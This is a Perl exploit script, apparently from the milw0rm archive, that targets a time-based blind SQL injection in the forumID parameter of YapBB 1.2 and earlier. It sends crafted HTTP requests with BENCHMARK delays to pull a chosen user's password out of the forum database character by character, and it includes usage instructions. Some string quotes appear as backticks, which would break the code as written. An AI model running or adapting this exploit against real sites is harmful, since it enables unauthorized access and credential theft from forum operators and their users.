YapBB <= 1.2 (forumID) Blind SQL Injection Exploit --+++======================================================+++--
--+++====== YapBB <= 1.2 Blind SQL Injection Exploit ======+++--
--+++======================================================+++--

#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;

sub usage
{
	die `\nYapBB <= 1.2 Blind SQL Injection Exploit`.
	    `\n[?] Author  : darkjoker`.
	    `\n[?] Site    : http://darkjoker.net23.net`.
	    `\n[?] CMS Site: http://yapbb.sourceforge.net/`.
	    `\n[?] Usage   : perl ${0} <hostname> <path> <username> [<key_list>]`.
	    `\n[?] Ex.     : perl ${0} localhost /YapBB root abcdefghijklmnopqrstuvwxyz`.
	    `\n\n`;
}

sub query
{
	my ($user, $chr, $pos) = @_;
	my $query = `123 OR IF ((ASCII(SUBSTRING((SELECT password FROM `.
	`forum_user WHERE nickname = '${user}'),${pos},1))=${chr}),BENCHMARK(200000000,CHAR(0)),0)`;
	$query =~ s/ /%20/g;
	$query =~ s/'/%27/g;
	return $query;
}

sub exploit
{
	my ($hostname, $path, $user, $chr, $pos) = @_;
	$chr = ord ($chr);
	my $sock = new IO::Socket::INET (
						PeerHost => $hostname,
						PeerPort => 80,
						Proto    => `tcp`
					) or die `\n[!] Exploit failed.\n\n`;

	my $query = query ($user, $chr, $pos);
	my $request = `GET ${path}/forumhop.php?action=next&amp;forumID=${query} HTTP/1.1\r\n`.
		      `Host: ${hostname}\r\n`.
		      `Connection: Close\r\n\r\n`;
	
	my $a = time ();
	print $sock $request;
	$_++ while (<$sock>);
	$a = ($a - time ()) * -1;
	close ($sock);

	return 1 if ($a > 4);
	return 0;
}
		
my ($hostname, $path, $user, $k_list) = @ARGV;
usage unless ($user);
my @key = split (``, ($k_list) ? $k_list : `abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789`);
my $chr = 0;
my $pos = 1;
my $password;
while ($chr < scalar (@key))
{
	if (exploit ($hostname, $path, $user, $key [$chr], $pos))
	{
		$password .= $key [$chr];
		$chr = 0;
		$pos++;
	}
	else
	{
		$chr++;
	}
}

print `\n[+] Password: ${password}\n\n`;

# milw0rm.com [2009-02-04]